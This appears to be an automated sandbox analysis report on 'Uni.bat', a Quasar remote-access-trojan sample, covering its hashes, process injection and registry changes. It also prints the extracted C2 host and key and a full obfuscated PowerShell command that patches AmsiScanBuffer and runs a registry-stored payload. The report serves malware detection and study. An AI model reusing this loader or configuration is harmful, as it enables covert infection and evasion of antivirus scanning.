Analysis
-
max time kernel
48s -
max time network
26s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 20:30
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240508-en
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/3352-75-0x0000000007A10000-0x0000000007A7C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2548 created 636 2548 powershell.EXE winlogon.exe PID 2408 created 636 2408 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 2 3352 powershell.exe 3 3352 powershell.exe 4 3352 powershell.exe 5 3352 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2356 powershell.exe 3112 powershell.exe 3352 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
install.exeinstall.exepid process 2340 install.exe 4652 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2548 set thread context of 3092 2548 powershell.EXE dllhost.exe PID 2408 set thread context of 3728 2408 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 2356 powershell.exe 2356 powershell.exe 3112 powershell.exe 3112 powershell.exe 3352 powershell.exe 3352 powershell.exe 2548 powershell.EXE 2548 powershell.EXE 2548 powershell.EXE 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3352 powershell.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe 3092 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe Token: SeUndockPrivilege 3112 powershell.exe Token: SeManageVolumePrivilege 3112 powershell.exe Token: 33 3112 powershell.exe Token: 34 3112 powershell.exe Token: 35 3112 powershell.exe Token: 36 3112 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe Token: SeUndockPrivilege 3112 powershell.exe Token: SeManageVolumePrivilege 3112 powershell.exe Token: 33 3112 powershell.exe Token: 34 3112 powershell.exe Token: 35 3112 powershell.exe Token: 36 3112 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe Token: SeUndockPrivilege 3112 powershell.exe Token: SeManageVolumePrivilege 3112 powershell.exe Token: 33 3112 powershell.exe Token: 34 3112 powershell.exe Token: 35 3112 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3352 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4396 wrote to memory of 2356 4396 cmd.exe powershell.exe PID 4396 wrote to memory of 2356 4396 cmd.exe powershell.exe PID 4396 wrote to memory of 2356 4396 cmd.exe powershell.exe PID 2356 wrote to memory of 3112 2356 powershell.exe powershell.exe PID 2356 wrote to memory of 3112 2356 powershell.exe powershell.exe PID 2356 wrote to memory of 3112 2356 powershell.exe powershell.exe PID 2356 wrote to memory of 4740 2356 powershell.exe WScript.exe PID 2356 wrote to memory of 4740 2356 powershell.exe WScript.exe PID 2356 wrote to memory of 4740 2356 powershell.exe WScript.exe PID 4740 wrote to memory of 1420 4740 WScript.exe cmd.exe PID 4740 wrote to memory of 1420 4740 WScript.exe cmd.exe PID 4740 wrote to memory of 1420 4740 WScript.exe cmd.exe PID 1420 wrote to memory of 3352 1420 cmd.exe powershell.exe PID 1420 wrote to memory of 3352 1420 cmd.exe powershell.exe PID 1420 wrote to memory of 3352 1420 cmd.exe powershell.exe PID 3352 wrote to memory of 2340 3352 powershell.exe install.exe PID 3352 wrote to memory of 2340 3352 powershell.exe install.exe PID 3352 wrote to memory of 2340 3352 powershell.exe install.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 3092 2548 powershell.EXE dllhost.exe PID 3092 wrote to memory of 636 3092 dllhost.exe winlogon.exe PID 3092 wrote to memory of 688 3092 dllhost.exe lsass.exe PID 3092 wrote to memory of 992 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 432 3092 dllhost.exe dwm.exe PID 3092 wrote to memory of 708 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1040 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1108 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1124 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1132 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1196 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1252 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1296 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1352 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1436 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1560 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1600 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1636 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1652 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1752 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1808 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1816 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1948 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2024 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2032 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 1744 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2056 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2148 3092 dllhost.exe spoolsv.exe PID 3092 wrote to memory of 2284 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2364 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2476 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2484 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2520 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2588 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2636 3092 dllhost.exe sysmon.exe PID 3092 wrote to memory of 2664 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2680 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2692 3092 dllhost.exe svchost.exe PID 3092 wrote to memory of 2836 3092 dllhost.exe sihost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e10ab489-e56a-4c83-9084-e2ce86a3df54}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{888db787-3890-4d2d-b80f-ebe9d9e2d35c}2⤵PID:3728
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gLBaSYPbFGws{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TFdaypEPkXvhYM,[Parameter(Position=1)][Type]$BzeLuhHxxH)$MxizyeaumOE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+'M'+'yD'+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+''+'A'+''+'u'+''+'t'+''+[Char](111)+''+'C'+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$MxizyeaumOE.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TFdaypEPkXvhYM).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$MxizyeaumOE.DefineMethod(''+[Char](73)+'nv'+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c'+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$BzeLuhHxxH,$TFdaypEPkXvhYM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+'m'+'e,'+[Char](77)+'an'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $MxizyeaumOE.CreateType();}$LEnTzXijJEkyI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m'+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+'i'+[Char](99)+''+'r'+''+[Char](111)+''+'s'+'o'+'f'+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+'f'+'e'+'N'+[Char](97)+''+'t'+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$LWIwHSgsRDLWai=$LEnTzXijJEkyI.GetMethod('G'+[Char](101)+'tP'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AzSbkRHaYIHxEorCPVr=gLBaSYPbFGws @([String])([IntPtr]);$IaoYTbBXmcvdMYrHhPETki=gLBaSYPbFGws @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WFyqsBGSfqD=$LEnTzXijJEkyI.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+'H'+'a'+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$pHciorWQFTutdz=$LWIwHSgsRDLWai.Invoke($Null,@([Object]$WFyqsBGSfqD,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'dL'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$sdnJaNOcmpEcSQdiG=$LWIwHSgsRDLWai.Invoke($Null,@([Object]$WFyqsBGSfqD,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+'ua'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$AWeOosv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pHciorWQFTutdz,$AzSbkRHaYIHxEorCPVr).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$UUSvFzBecZXRQrKdI=$LWIwHSgsRDLWai.Invoke($Null,@([Object]$AWeOosv,[Object]('Am'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+''+'f'+''+'f'+''+'e'+''+'r'+'')));$BIXPnmoCpK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sdnJaNOcmpEcSQdiG,$IaoYTbBXmcvdMYrHhPETki).Invoke($UUSvFzBecZXRQrKdI,[uint32]8,4,[ref]$BIXPnmoCpK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UUSvFzBecZXRQrKdI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sdnJaNOcmpEcSQdiG,$IaoYTbBXmcvdMYrHhPETki).Invoke($UUSvFzBecZXRQrKdI,[uint32]8,0x20,[ref]$BIXPnmoCpK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+'T'+''+[Char](87)+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2548 -
